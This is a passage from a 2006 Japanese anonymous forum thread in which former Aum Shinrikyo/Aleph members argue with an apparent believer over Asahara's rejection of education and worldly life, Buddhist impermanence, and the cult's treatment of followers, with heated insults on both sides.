麻原の教義が正しいという保証は?証拠は?

236 :名無しさん@3周年:2006/08/24(木) 11:52:49 ID:ctawRnn9
>>234
いやいや、スレ主の許可なくしておもしろいことなんかやったら
大変、大変。
そのうち面白い「モノ」ができあがるから楽しみに待っててね!!
P・Sトロイの賢者一同よりwwww

237 :名無しさん@3周年:2006/08/24(木) 11:54:24 ID:ctawRnn9
修行すれば分かるのである。
修行嫌いなキャンディには分からないのである、どうだこれは?

238 :名無しさん@3周年:2006/08/24(木) 11:55:01 ID:qY4Yheop
>早い人では、3歳くらいから、遅い人でも、小学校に入るくらいから、習い事がはじまる。
こんな習い事をやったって、来世に持っていける訳がない。

来世にもっていけないが、今生を人よりうまく生きることの足しには
なることがある
漏れは、自発的にだが、小学生のときに英語を習いにいって
おかげで、この教化だけは、苦労せずともいつも高得点だった
こだわりすぎると、かえって苦になるけどね、、

小さいときに習っておけば、人が苦を感じることが、楽であることもある
嫌いなのにさせるからいけないのだと思う
イングウェイ(世界一早いギタリスト)もまだ手が小さい子供のうちから
母親が買い与えたギターで遊び、世界中に知られるギタリストになった
好きなことをやって、飯が食えるのだからいうことない
バカでも小さいときから習わせればそれなりになるということはあり


239 :名無しさん@3周年:2006/08/24(木) 11:56:45 ID:4heaV/z1
>>237

その修行が正しい保証は?証拠は?

240 :名無しさん@3周年:2006/08/24(木) 11:58:01 ID:4heaV/z1
>>229

俺は教団に関わってしまって貴重な時間を失った自覚があるが?

241 :名無しさん@3周年:2006/08/24(木) 11:58:02 ID:ctawRnn9
小学校に入ると酷いもので、小学校1年から既に、6時間、通学時間をいれたら7時間くらいの制約時間が始まる。
ここで教えられるものは、真理と全く程遠い内容で、まあ、この現世を渡っていくには、少しは利益がある内容だが、真理を悟るためには、不必要な内容を教え込まれる。
そしてこれによって、いっそう、私は、必要のないデータを放り込み、心がどんどん暗くなる。
そして、学校で話す内容といえば、性欲・食欲の話である。
私はこれに汚されていく。
どんどん汚されていく。
そしてどんどん真理から遠のき、三悪趣への道を一直線である。
そして、スポーツと称した無知の遊びを、徹底的に叩き込まれ、心は完全に、何をなせば、自分は幸福になり、何をなさななければ幸福にならないのか、分らなくなる。
そして、中学・高校と過ぎていく。


242 :名無しさん@3周年:2006/08/24(木) 12:00:10 ID:4heaV/z1
>>241

膣汚学校でいじめられてたんだってな。
だから学校での思い出が暗いから学校を否定するんだろうな。


243 :名無しさん@3周年:2006/08/24(木) 12:00:49 ID:qY4Yheop
>そして、少し成長すると、次は、行動の自由を、父母によって、
あるいは兄弟によって奪われる。

不幸な家庭に育ったんだね
普通は何もできない自分を、苦労して面倒みてくれたって親に感謝するものなのに
よほど教育熱心な親だったんだな
金がないと、習い事だってさせてもらえないよ
給食費だって払えないガキが増えているのに

244 :名無しさん@3周年:2006/08/24(木) 12:03:52 ID:4heaV/z1
普通、自分の中に何があるのかを見ていくのが悟りへの道だが・・・改めて説法の内容を見ていると
なるほど実は外側の世界や他人に責任転嫁していたのがよく分るな

245 :名無しさん@3周年:2006/08/24(木) 12:04:39 ID:ctawRnn9
文学と称する、煩悩を増大させる本を読み、それが読み、書ければ称賛される。音楽と称し、一見、美しい、しかし、五妙欲の耳根と、それから、対象である、音との結を強める、学問が上達すれば称賛される。
このような形で私は、五妙欲とどんどん縁が深くなり、無明がひどくなる。
そして、大人になる。
大人になると、お決まりのコースで、できるだけ良い大学を出、そして、就職する。もちろん、この大学時代も、心を乱す酒を覚え、そして、性欲を増大させる異性の遊びが含まれるようになる。
そして就職する。


246 :名無しさん@3周年:2006/08/24(木) 12:06:07 ID:qY4Yheop
悪いけど、勉強が嫌いだから、そういうセリフが出るんだと、漏れなんかは
思うね、、
確かに、おしゃべりの内容は悪いのかもしれない
センセイも、穢れているかもしれない
しかし、勉強は大事だよ
字も書けなかったらどうするつもりだ?
まあ、普通の生活する人は、そんな難しい学問はせんでいいと思うけど
オウムの学校にいかなくていいってのは、行き過ぎね
結局、幹部は大学卒ばかりじゃないか!
なんだかんだいっても、最後は知識知能ある人に頼ったのさ
主張に一貫性がない
そんなに現世の価値を否定して、どう東京で展開していくのかね
、、ヒマラヤにいけばいいんだよ

247 :名無しさん@3周年:2006/08/24(木) 12:06:43 ID:4heaV/z1
ああ。何もかもがイヤだったんだな。麻原のおっさん。
そんなに世の中を憎んでたのか・・・

248 :名無しさん@3周年:2006/08/24(木) 12:07:39 ID:ctawRnn9
現世の哀れさをよく知っているからこそ、それを否定できるのである。
これはいいね?

249 :名無しさん@3周年:2006/08/24(木) 12:08:24 ID:4heaV/z1
>>246

>ヒマラヤにいけばいいんだよ

すまん。
その意見には賛同しかねる。

ヒマラヤが穢れる・・・

250 :名無しさん@3周年:2006/08/24(木) 12:09:50 ID:4heaV/z1
>>248

その自分を生かしてくれてるのは現世だとよく正知しなさい。いいね?

251 :名無しさん@3周年:2006/08/24(木) 12:12:09 ID:ctawRnn9
>>250
いや、関わらせてあげているのである。
真理勝者との縁を感謝しなさい。いいか?

252 :名無しさん@3周年:2006/08/24(木) 12:12:47 ID:qY4Yheop
>できるだけ良い大学を出

キミのいいたいことはわかるし、好きだよ
でも、勉強や習い事が好き、って人もいるの
、、たとえば、語学に秀でている人ってのは一種の神通を持っていると
私は思うのね
語学のできない日本人は外人怖がるんだけど、話せれば友達になるしね
世界中の人と意思の疎通ができるのと、同じ言語だけでしか理解しあえないってのは
広がりが違うと思っていた

おもしろいってね、

253 :名無しさん@3周年:2006/08/24(木) 12:14:09 ID:4heaV/z1
>>251

それは「慢」である。
麻原のおっさんとの縁なぞクソ食らえである。これは理解できるか?

254 :名無しさん@3周年:2006/08/24(木) 12:16:07 ID:ctawRnn9
>>252
だったら今からでも通訳目指し精進しなさい。
もうここへはきては行けない、分かったね?
今日限りだ。

255 :名無しさん@3周年:2006/08/24(木) 12:16:47 ID:4heaV/z1
>>251

だいたいその現世から生まれ出てきたクセに「関わらせてあげてる」だ?w
現世なくしてなんの「聖」ぞ。
「聖」を体験させてくれる「現世」もまた「聖」の一面と知れ。

256 :名無しさん@3周年:2006/08/24(木) 12:17:29 ID:qY4Yheop
ただ、その世界中の人が使う言語を何にするかってので
また議論があるみたいだけどね、、
英語は、英語圏の人に有利だから、なんで世界共通語を日本語にしてはいけないのかとか
考えすぎると面倒だけどさ

257 :白龍:2006/08/24(木) 12:19:05 ID:MMe3eGCG
>>248
現世の哀れさを知っている者は、
現世の者を、慈悲の目で見、哀れみの行為を為すのでないでしょうか?
教祖は、そういう修行者になってほしいと、
あなたを指導したのではないんですか?
自分の意に沿わない相手を許さず、威嚇し、法を弄ぶあなたをグルは喜ぶだろうか?

258 :名無しさん@3周年:2006/08/24(木) 12:19:57 ID:ctawRnn9
>>253
いや、「徳」に他ならない。
キミのような一凡夫のクソ食らえという意見なぞ幻影に囚われている
証である、違うか?そうだな?

259 :名無しさん@3周年:2006/08/24(木) 12:23:41 ID:qY4Yheop
たとえば、仏教が日本に届いたのだって、途中の人の
三蔵法師とかが、通訳してくれたおかげだからね、、
今は飛行機でビュンだけど、命がけで経を取りにいって
どうしたら、うまく別の言語に置き換えられるかとか、悩んだらしい

だから、道具としての語学であり、数学よね
オウムにおいては、伝えたいのは真理だけども、道具がないと伝えられない
だから、好きなほうをすればいいと思う
私が教団にきてカッとなったのは、人が勉強したいのに
その価値を否定するってことよ、、
あんたみたいに勉強嫌いは、勉強しなくていいオウムがお気に入りかもしれんが
漏れは、やりたいと思っていた



260 :名無しさん@3周年:2006/08/24(木) 12:24:28 ID:ctawRnn9
幻影でないもの、それはニルヴァーナだけである。
一切は無常、幻影である。



261 :名無しさん@3周年:2006/08/24(木) 12:25:22 ID:4heaV/z1
>>258

ははははは!
意味不明だ。
「関わらせてあげている」というその心の働きを「慢」だと言っているのだよ。
文脈も理解できないで応えを吐かない方がいいぞ。
それに「積極的に関わっていく」のが菩薩行であって「関わらせてあげている」なんて
のは考え違いのなにものでもない。



262 :和井 恵:2006/08/24(木) 12:27:04 ID:tid3vBbu
>>226
>あるリンポチェが「オウムの教義は解放への道ではない。
>あれはグルという名の独裁者に従う奴隷の道だ。
>従う限り解放はあり得ない」って言ってましたね。

私も、オウムの教義に囚われている限り、
本当の「解脱・悟り」へは到達できない、
という意見に賛成!

オウムの教義は、目指す目標への到達を阻み、
障害となるような「観念・謬見解」に満ちていると思う…

「最終解脱」とやらを本当にしていたのなら、
あんな「(解脱・悟りにとって)有害な教義」は、
決して造らなかったと思うよ。

263 :名無しさん@3周年:2006/08/24(木) 12:27:13 ID:qY4Yheop
勉強することの価値や就職の価値をバカにするなら
そこで働いて金をもってきた信者の布施でメシ食わないでくれよ

そうやって在家をバカにしたいんだろ?

264 :名無しさん@3周年:2006/08/24(木) 12:29:49 ID:ctawRnn9
>>261
その傲慢な言葉ははさすがはナーギタ。
いや、その名は捨てたか?
「慢」にはならない。真理に縁をつけさせる事は
大いなる功徳である。

265 :名無しさん@3周年:2006/08/24(木) 12:32:09 ID:qY4Yheop
そうやって学校や就職の価値をおとしめるから
教団に集まってくるのは、学校嫌いとか、仕事嫌いな奴になるんだよ

漏れ、教団の男で、働き者ってあんまりみたことないんだよね
サマナの多くは別だろうけど、在家や下向サマナってウダウダしているの
多いし
女のヒモになりたいって公言した奴、いたよ長くやっている信徒でさ
冗談じゃなくて、働くの嫌いね
そうやって、世間でうまくやっていくことを否定するから
うまくやっていけない奴の、吹き溜まりになっちまうんだよ
居心地がいいのさ!

266 :名無しさん@3周年:2006/08/24(木) 12:33:19 ID:4heaV/z1
>>264

残念w
俺は今教団で噂の独自の変な真理を吹聴している方だw

だからその真理とやらが本物である証拠・証明は?
それが本物なら「得」だろうよ。
でも偽者なら「毒」だよ。
まず証明せよ。

ところで和井さん、この>>251からのやり取りどう思う?



267 :名無しさん@3周年:2006/08/24(木) 12:33:19 ID:ctawRnn9
>>オウムの教義は、目指す目標への到達を阻み、
障害となるような「観念・謬見解」に満ちていると思う…

そのような見解こそ捨てるべき見解。
これでは解脱は訪れはしない。

268 :名無しさん@3周年:2006/08/24(木) 12:34:41 ID:4heaV/z1
>>267

>これでは解脱は訪れはしない。

それはどうやって証明する?

269 :和井 恵:2006/08/24(木) 12:36:51 ID:tid3vBbu
>>248
>現世の哀れさをよく知っているからこそ、
>それを否定できるのである。
>これはいいね?

君の頭の中で描いた「観念的なお話」は、
それで終わりかね?

目の前の「本当の世界」を知らないから、
そういう「否定(独断)」ができるんだろうね…

270 :名無しさん@3周年:2006/08/24(木) 12:37:11 ID:4heaV/z1
>>267

>そのような見解こそ捨てるべき見解。

その根拠は?

271 :名無しさん@3周年:2006/08/24(木) 12:37:40 ID:ctawRnn9
>>266
修行しなければ見えてくるわけもない。
「仏典の意義はその実践にある」と何度も説かれていた。
ナーギタもその偽者も実践をしてみなさい。
マントラを何万回と唱えてみなさい。


272 :白龍:2006/08/24(木) 12:41:14 ID:MMe3eGCG
グルの話を出しても反応しないということは、
単なる煽りか釣り?

273 :名無しさん@3周年:2006/08/24(木) 12:42:16 ID:ctawRnn9
>>269
元ナーギタよ、その本当の世界が何故幻影であると気がつかない?

274 :名無しさん@3周年:2006/08/24(木) 12:42:28 ID:4heaV/z1
>>271

おいおい。
それでは修行してないものをどうやって導くのだ?
まずは自分のとこの正当性を証明しなくては・・・でないと誰もついてかないし、誰が怪しい修行なんてやるものかよ

275 :名無しさん@3周年:2006/08/24(木) 12:45:24 ID:4heaV/z1
>>273

幻影・無常だと何か不都合なのか?

276 :名無しさん@3周年:2006/08/24(木) 12:46:07 ID:ctawRnn9
>>272
グル非難は問題外である。
私は威嚇などしてはいないが?

277 :名無しさん@3周年:2006/08/24(木) 12:46:45 ID:qY4Yheop
外国に飛行機でビュンと行くのだって、それを作れるだけの
技術があるからだよ あるいは飛ばすだけの技術があるからさ
だから、現世のすべてを否定したら
生まれた土地から一歩も出れない
たまたま、そこで、いいグルにめぐり合えればいいんだけどね

241 でも、そういうことをすべて考慮しても、修行というのは
非常に大事だと、思ったよ だから供養した 修行者には高い知性を感じる

ようは技術を何に使うか、通訳もね エロ本訳すのはあまりためにならないし
せっかく言葉が通じても、世界をマタにかけて、悪いことするなら
しゃべれないほうがいいし

あんたの話聞いていると、ただ世の中を悪いところだと、完全に思うようだが
そんなふうだから、サリン巻いたんだ、って思われるぜ
世間を毛嫌いしているから、こんな世間はなくていいって、、


278 :名無しさん@3周年:2006/08/24(木) 12:46:47 ID:4heaV/z1
なんとなくこの傲慢であまり頭の良くない理論展開は・・・
ある男を思い出すなぁ・・・
二ノ宮?

279 :名無しさん@3周年:2006/08/24(木) 12:48:02 ID:ctawRnn9
>>275
三悪趣へと至るつもりか?
死んでから気づいても遅い。



280 :和井 恵:2006/08/24(木) 12:48:13 ID:tid3vBbu
>>248
>現世の哀れさをよく知っているからこそ、
>それを否定できるのである。
>これはいいね?

君の頭の中で描いた「観念的なお話」は、
それで終わりかね?

目の前の「本当の世界」を知らないから、
そういう「否定(独断)」ができるんだろうね…


281 :和井 恵:2006/08/24(木) 12:49:06 ID:tid3vBbu
>>251
>真理勝者との縁を感謝しなさい。いいか?

馬鹿げた「押しつけ」だこと。
彼を「真理勝者」だなんて思っているのは、
ほとんど誰もいないって!
教団内部の人間か、もしくは「元」の一部の人だけさ。

282 :和井 恵:2006/08/24(木) 12:51:58 ID:tid3vBbu
>>257
>キミのような一凡夫のクソ食らえという意見なぞ
>幻影に囚われている証である、違うか?そうだな?

「証である」と言いながら、
何の「証(証明)」もしていない。
教祖の説法にそっくりだね^^

>違うか?そうだな?

押しつけがましいだけかと思ったら、
そうでもないんだね。

「違うよ!そうではないね。」


283 :和井 恵:2006/08/24(木) 12:52:51 ID:tid3vBbu
>>260
>幻影でないもの、それはニルヴァーナだけである。
>一切は無常、幻影である。

じゃあ、「ニルヴァーナ」とは何なのかな?

284 :名無しさん@3周年:2006/08/24(木) 12:53:21 ID:4heaV/z1
>>279

いや。
無常・幻影だからこそ現実は変容できるのだし、絶望しても這い上がれる。
釈迦は「全ては無常だ。だから絶望的だ」と説いたのではなく「無常だ。だからどんな絶望的な状況にあろうとも
これは固定されている訳ではない。状態は変化する。常に変化する。だから絶望は希望に変わるし、不幸は幸福に
変わるし、我々はそれを利用して解脱できる」
と説いているのだと思うのだが?

285 :名無しさん@3周年:2006/08/24(木) 12:54:52 ID:qY4Yheop
嫌いなのに押し付けられた、っていうなら
学校もオウムの修行も同じだからさあ!
漏れは、入信して自分の持っているすべての価値を否定されて、心底うらんでいたよ
こいつらは、私の人格をすべて否定するつもりだ、って、、

グルにへこびつらう奴ばかり、修行をいいものだと、いうものばかりが
肯定されて、世俗で好きに暮らしたいって私見たいのは
バカ扱いでしたからね!
あんたが、学校嫌いなのと同じくらい、私はオウムが嫌いでした
自分たちの価値観ばかり、すごい勢いで押し付けましたからね!
修行が好きな人には天国だけどね、、
違うことがしたい人もいるんだから


286 :和井 恵:2006/08/24(木) 12:55:12 ID:tid3vBbu
>>264
>その傲慢な言葉ははさすがはナーギタ。

ちゃんとIDを確認してから言いなさいね。
恥をかくだけだから…

287 :名無しさん@3周年:2006/08/24(木) 12:59:09 ID:4heaV/z1
無常だから我々は変化できる。
無常はある意味、いや、これこそは我々にとっての「宝」なのでは?
だってそれがあるから解脱できる。

無常を否定的に捉えるか肯定的に捉えるか、それも超えて肯定も否定もない・・・ここに解脱とか悟りとか
ニルヴァーナの道があるのでは?

288 :和井 恵:2006/08/24(木) 12:59:28 ID:tid3vBbu
>>266
>ところで和井さん、この>251からのやり取りどう思う?

一方的な「決め付け」を出し続けることで、
「自己防衛」をしながら頑張ってるんじゃないかな。
良くやっている方だと思うよ、彼なりにね。

289 :名無しさん@3周年:2006/08/24(木) 12:59:39 ID:qY4Yheop
>修行が好きな人には天国だけどね、、
違うことがしたい人もいるんだから

学校で勉強ができないと引け目を感じるのと同じく
教団で修行に身が入らないと、バカ扱いですから
それも、魂の質が違うかのごとく、言われますからね!
死んでも他人に、自分の教義を押し付けたいって感性していて
学校教育、親の教育は押し付けだって、どうしていえるのか
自分らも、嫌がられることをしているのは同じだぜ?

もれが、どんな勢いでうるさく修行を押し付けられたかは過去ログに
嫌というほど書いたさ


290 :和井 恵:2006/08/24(木) 13:01:07 ID:tid3vBbu
>>267
>これでは解脱は訪れはしない。

それはどうかな?

291 :名無しさん@3周年:2006/08/24(木) 13:02:02 ID:4heaV/z1
>>288

ふむ。
ありがとう^^

292 :和井 恵:2006/08/24(木) 13:04:48 ID:tid3vBbu
>>271
>修行しなければ見えてくるわけもない。

私は、オウムの「修行」とは「別のやり方」を
これまでずっと「実践」してきた。
だから、「確信」を持って私の見解を述べている。

293 :白龍:2006/08/24(木) 13:06:36 ID:MMe3eGCG
>>276
>>208
キャンディ、起きたかw
あんた許さんよ。
>>217
キャンディのお家の写真w
すぐ消しちゃうよ
>>225
目には目を 
歯には歯を

このような言動から、威嚇のように感じられます。
自分では、そう感じていないのかもしれないですけど。

294 :名無しさん@3周年:2006/08/24(木) 13:08:11 ID:4heaV/z1
白龍さん

いいなぁ・・・IDの後ろがGGGになってる・・・
なんとなくカッコイイw

295 :名無しさん@3周年:2006/08/24(木) 13:10:00 ID:qY4Yheop
てかさ、教祖が学校を否定するのって、自分が勉強嫌いだったからじゃ
ないんですか、って聞きたくなるよな?
いろいろ知らないことを学ぶのが楽しいって人はたくさんいるぜ?
ただ、現世の人だから、付き合っているうちに余計なデータも入るのが
まずいんであって、、

で、あとから大学行って勧誘するとか、結局はそういうほうに流れるし
バカばっかじゃ勤まらないって思ったのさ
教祖はすぐ方向転換するから 都合でもって
昨日言ったことと、今日言うことがもう違うのさ!
だから、新興宗教って言われるんだよ
何がこの教団のカラーなのかわからない、
まあ、グルの都合でなんとでも変わるとか説明できん

296 :名無しさん@3周年:2006/08/24(木) 13:14:29 ID:4heaV/z1
他人をバカと見下していたから学校が嫌いで(他人の集まりだから)
他人のバカにされたくないから大学出たエリートを集めて徴用してその上にふんぞり返ってたんじゃない?


297 :もう、嫌気が差してるけど・・・@狂犬&狂牛のような元信徒:2006/08/24(木) 13:14:53 ID:N5Ii49K7
>>206 :白龍 :2006/08/24(木) 09:48:24 ID:MMe3eGCG
>>>204
>>真理の実践者を自称するなら、最低限、基本的な「十の戒律」くらいは守って頂きたい物ですね。
>本当にそう思います。

派閥を問わず、あの糞アーレフの腐れ偽出家修行者どもに「十の戒律」を守れだなんて・・・orz
残念だけど、もう、全然無理な話だね!

戒律があってもそれを守れるだけの功徳が無いのが現状だからな。

※オウム・糞アーレフで言うところの功徳とは、上昇傾向のエネルギーで、尚且つ
 願望成就のエネルギーだったはずだが・・・w!

現糞アーレフでは、偽出家修行者どもが、戒律を守れるだけの功徳すらどこからも
調達できないって事だ。

そんな詐欺香具師どもが、出家修行者を自称しつつ、口先で人様を騙して、
カネを巻き上げながら、日々、平然と生き恥を晒し続けてるんだろうからな・・・www

298 :もう、嫌気が差してるけど・・・@狂犬&狂牛のような元信徒:2006/08/24(木) 13:15:31 ID:N5Ii49K7
上祐氏って人は、口先だけで、内容の伴わない奇麗事を垂れ流す事にかけては一流だよ。
日頃から大嘘吐きで誉れ高い腐れ馬糞外道野郎なんか、簡単にコロッと騙されてるんだから
私など、内心、可笑しくて笑いが止まりませんよ、。

修行には、絶対不可欠とされる肝心要の功徳だけど・・・
あの上祐氏には、それを他の魂に与える事など間違っても出来ないって事は実証されてる。
事件後も、せっかく教団に残ってがんばってたはずの腐れ偽出家修行者どもに、持戒も遵守さ
せる事が出来なかった人に、これからいったい何ができるんでしょうかね?

そんな上祐氏にすがるしかない、気の狂った腐れ偽出家修行者どもが一番哀れだ。

現糞アーレフで行われている法則の実践ってのは、かつてオウムで言われていた
三悪趣へ至る実践だよな。

上祐氏始め、上層部の指導の賜物だぜ!!

299 :白龍:2006/08/24(木) 13:15:56 ID:MMe3eGCG
>>294
GCGだよ。GGGならかっこいいけど、ジジだね。(笑)
あなたが先ほど書いてた件だけど、
私も、某正悟師さんかと一瞬感じた。
まあありえないでしょうけど。雰囲気がね・・。



300 :もう、嫌気が差してるけど・・・@狂犬&狂牛のような元信徒:2006/08/24(木) 13:16:39 ID:N5Ii49K7
現糞アーレフに於ける上祐氏って存在は、所詮、どう転んでも『傀儡』です。
麻原の傀儡であり、公安の傀儡であり、お坊ちゃんたちの傀儡でもあるんだろ?私は知らないけど。
そして、現糞アーレフの、曲がりなりにも、一応代表だったよな?例えば、お役所へ行く時とか!

結局、上祐氏の意志なんて、有って無いに等しいって事だろ。
気の毒なようだが、自分が、そういうポジションに甘んじてるんだから、文句は言えまいよ。
あの人は、自分の意志だけでは、何も出来ない人なんだよ。
そういう人に、必要以上に期待しても、あとあと失望するだけだ罠。

上祐氏の場合、傀儡だから、その場しのぎの口先だけで十分用が足りてるんだろ。
とりあえず、腐れ偽出家修行者どもを騙して、引き止めて働かせて、少しでも時間稼ぎが
出来ればそれでいいわけだ。

口先だけで、少しでも、間を持たせる事が出来れば、それで十分って事だろよ!!

301 :名無しさん@3周年:2006/08/24(木) 13:17:45 ID:4heaV/z1
>>299

おや。
これは無智でしたな。
よく見ると違うね。

うん。
雰囲気がね・・・。

302 :白龍:2006/08/24(木) 13:18:00 ID:MMe3eGCG
>>297
あれ。久々に丑ちゃん登場。いらっしゃい。

303 :和井 恵:2006/08/24(木) 13:18:06 ID:tid3vBbu
>>273
>元ナーギタよ、その本当の世界が何故幻影であると気がつかない?

「幻影」には「苦しみ」が付きまとう。
心はそれに惑わされ続け、一時も休まることはない。
しかし、「本当の世界」には「苦しみ」は存在しないのさ。

解るかな?この意味が。解らないだろうな…

304 :名無しさん@3周年:2006/08/24(木) 13:18:25 ID:ctawRnn9
ははは、ナーギタの言う見解なぞたかが知れているよ。
一切は相関関係によって成り立っていると。
修行によって確かめられることを証明不可能と決め付ける傲慢さ。
キミは何年修行したんだったかな?

ナーギタの幸せは何も知らないがゆえの赤ん坊ならではの
無智に起因する低俗な幸せに囚われて感じているものにすぎない。
議論に値しない、いいか?



305 :名無しさん@3周年:2006/08/24(木) 13:18:46 ID:4heaV/z1
牛っち、今日も元気だね^^

306 :名無しさん@3周年:2006/08/24(木) 13:20:20 ID:qY4Yheop
私は自分の親が好きだし、(欠点もあるけどよ)
学校も好きだったよ
嫌な奴もいたけどさ
それが、健全なんじゃないかなあ、、
なんで、そんな過激にあれもこれも悪いっていうのかわからん
よほど押し付けがましい親に勉強させられて
嫌いになったと思える

まあ、教団に言わせれば、汚い水も住み慣れると居心地がいいっていうんだろうけど
うちの親は凡夫だけど、いつも一番に漏れのことを考えてくれる
教祖なんかひどいもんだよ

307 :名無しさん@3周年:2006/08/24(木) 13:22:19 ID:qY4Yheop
てか、学校に行くと性欲の記憶するてのが、妙
普通は勉強をしにいくところ
自分が遊んでいたんじゃネエノか あるいは友達が悪い

308 :名無しさん@3周年:2006/08/24(木) 13:23:19 ID:4heaV/z1
>>304

逃げるのはいいんだけど、その応え、日本語の会話にもなってないよ。
無智だね。
絶対は存在しないよ。
修行で得た経験もね。
解脱するまではね。
あなたのその見解は無智が起因の迷妄だね。
オウムやってないで精神科に行きなさい。いいね?

309 :名無しさん@3周年:2006/08/24(木) 13:24:07 ID:4heaV/z1
>>307

その通り!w


310 :名無しさん@3周年:2006/08/24(木) 13:25:22 ID:qY4Yheop
教祖なんかひどいもんだよ >
信者は金もってくればいいと思っているんだよ


311 :和井 恵:2006/08/24(木) 13:25:56 ID:tid3vBbu
>>299
>私も、某正悟師さんかと一瞬感じた。
>まあありえないでしょうけど。雰囲気がね・・。

へー、二宮君って、あんな感じなの?
それはそれは…

312 :白龍:2006/08/24(木) 13:26:25 ID:MMe3eGCG
>>304
唐突な質問で申し訳ないですけど、
そこまで、グルに執着していて、
もし、教祖が死刑になったら、どうされるの?
教団は辞めるの?
それとも、修行は続けるんですか?
グルと一緒に転生することもありえるんですか?

313 :名無しさん@3周年:2006/08/24(木) 13:26:45 ID:ctawRnn9
>>308
はははそれはキミのことじゃないか?違うかね?
論点をそらしてはいけないよ。w


314 :白龍:2006/08/24(木) 13:28:28 ID:MMe3eGCG
>>311
昔はちょっとあんな感じがあったけど、
正悟師になってからは、そういう面を信徒にはみせなくなりました。

315 :名無しさん@3周年:2006/08/24(木) 13:30:29 ID:ctawRnn9
私はここを見るのは初めてじゃない。
ナーギタはシャバダバと酷似しているよ。
元出家修行者の身でありながら。w
二人で知恵を出し合ったのかね?
その相関関係とやらは?w


316 :和井 恵:2006/08/24(木) 13:31:32 ID:tid3vBbu
>>304
>修行によって確かめられることを証明不可能と決め付ける傲慢さ。

証明不可能と言っているのではなく、
オウムの修行は「有毒だ」と言っているのだよ。
最初は、多少の役には立つかも知れないがね。
途中で「袋小路」に入ってしまうのさ。

>キミは何年修行したんだったかな?

32年間だよ。それが何か?

317 :名無しさん@3周年:2006/08/24(木) 13:31:48 ID:4heaV/z1
>>313

はははははは!
自分がズレてることに気付いてないのだねw

318 :名無しさん@3周年:2006/08/24(木) 13:33:42 ID:4heaV/z1
>314

いえいえ。
それは信徒に見せてないだけで、某現役の師から「あの人は何も変わってない
」って聞いてるよw

319 :和井 恵:2006/08/24(木) 13:34:19 ID:tid3vBbu
>>304
>議論に値しない、いいか?

最後は、そうやって「自己防衛」に走るのか…
「修行」が足りないね。


320 :名無しさん@3周年:2006/08/24(木) 13:35:34 ID:4heaV/z1
僕はかれこれ22年かなぁ。修行歴。
もし、暗中模索の幼い頃まで含めていいならもう30年かなぁ。

321 :名無しさん@3周年:2006/08/24(木) 13:36:54 ID:ctawRnn9
>>316
32年修行してその有様か?まあ、妙な見解に取り付かれてしまって
いるみたいだからな。シャバダバ同様お気の毒だ。
真理の道に戻る気があるならまだ見込みはあるがな。

>>317
キミに至っては言葉の揚げ足取りしかできない
知的レベルの低い者だね?

322 :名無しさん@3周年:2006/08/24(木) 13:39:01 ID:4heaV/z1
>>321

いえいえ。
相手の言葉を一つずつ検証してるだけですよw
そう感じるのはあなたにそういう部分があるからなのではないですか?w
揚げ足取られるくらいの知的レベルw

323 :名無しさん@3周年:2006/08/24(木) 13:39:22 ID:ctawRnn9
>>319
ならそのナーギタの見解が無智ゆえでない物である
証明ができるかね?
所詮はキミとシャバダバが口を揃えて吼えている妄語。
無智ゆえでないと証明はできまい?違うか?


324 :名無しさん@3周年:2006/08/24(木) 13:41:49 ID:4heaV/z1
>>323

ここで「真理の法」とやらを振りかざしたあなたが先に証明すべき。

325 :名無しさん@3周年:2006/08/24(木) 13:42:16 ID:ctawRnn9
ナーギタも結局は自分の見解が間違いでないと
真に証明することはできないんだよ。
キミに苦がないなんてのは証明にもならない。
無智なんだからwそれなりの苦もない筈だわ。

326 :名無しさん@3周年:2006/08/24(木) 13:43:51 ID:4heaV/z1
>>325

ん?
和井さんがいつ自分の苦はないって言った?

327 :名無しさん@3周年:2006/08/24(木) 13:44:43 ID:6rRrhVJa
>325
この人トンチンカンなんですけど。


328 :和井 恵:2006/08/24(木) 13:45:50 ID:tid3vBbu
>>315
>元出家修行者の身でありながら。w
>二人で知恵を出し合ったのかね?
>その相関関係とやらは?w

「相関関係」というのは、
「相互依存関係」もしくは「相互補完関係」、
つまり、釈迦の説いた「縁起」のことかな?

シャバちゃんと私とでは、多々考え方が違うと思うけどね。
釈迦が「悟った」のは、「縁起」ではない。
「悟り」そのものを相手に伝えるのは難しいから、
「橋渡し的な説明」として、縁起を説いたと私は考えている。

シャバちゃんは、「苦を消滅するためのテクニック」と
考えているようだけど…

329 :名無しさん@3周年:2006/08/24(木) 13:45:58 ID:qY4Yheop
その勢いで、教祖の実子の教育に金をかけすぎる
教団を見直したらいいだろう?
あんたは学校が無駄だっていうが、知子が調子にのって
いくら教育費使っていると思うんだ?
私立に拒否された、って弁護士まで雇って仇取ろうとしている
修行者にはバカバカしい話さ!
やることないから、くだらんことに精を出すんだろ?
彼氏がいるって噂まであるのに、、

330 :名無しさん@3周年:2006/08/24(木) 13:46:26 ID:4heaV/z1
このトンチンカンかげん・・・ますます二ノ宮っぽいな・・・

331 :名無しさん@3周年:2006/08/24(木) 13:49:04 ID:4heaV/z1
無常の件には答えないな?
都合悪いのかな?

332 :和井 恵:2006/08/24(木) 13:50:12 ID:tid3vBbu
>ならそのナーギタの見解が無智ゆえでない物である
>証明ができるかね?

あのね、教祖の言葉だけを盲信するのではなくて、
ちゃんとアーガマなどを読んでご覧。
サーリプッタが、「縁起」を解りやすく説明しているから。

333 :名無しさん@3周年:2006/08/24(木) 13:50:28 ID:ctawRnn9
ナーギタはクンダリニーについてどう考えてるんだ?
そこを少し教えてくれないか?
それから偽者真理君もね。

334 :名無しさん@3周年:2006/08/24(木) 13:52:09 ID:4heaV/z1
>>287の無常は「宝」って件について答えて欲しいなぁ

どういう見解示すのかな?

335 :和井 恵:2006/08/24(木) 13:52:54 ID:tid3vBbu
>>327
>この人トンチンカンなんですけど。

そだね^^
ちょっと「突きすぎた」かな?
大分心が乱れて「地」が出てきたみたいだね…

336 :名無しさん@3周年:2006/08/24(木) 13:54:12 ID:ctawRnn9
>>331
キミは分かっていないな。
変化してしまうからこそ意味を成さないんだよ。
時と状況によりどうでも変わってしまうものが
真理だなんて話のネタにもならん。やはり無智か・・・

337 :名無しさん@3周年:2006/08/24(木) 13:55:05 ID:4heaV/z1
>>333

論点ずらし?
なんだか脈絡があまりにもないので答えない。
それに偽者呼ばわりかね?
相手に意見を聞く態度ではないね。
まずは礼儀から習い直したまえ。

338 :名無しさん@3周年:2006/08/24(木) 13:55:56 ID:qY4Yheop
よくもその性欲を記憶しがちな学校に
大金払って、しかも信者が法セのためにと差し出した金を
教祖の実子が使い込むことができるぜ!

わざわざ私立にやろうとするのが憎たらしい
公立で十分勉強できるじゃないか!
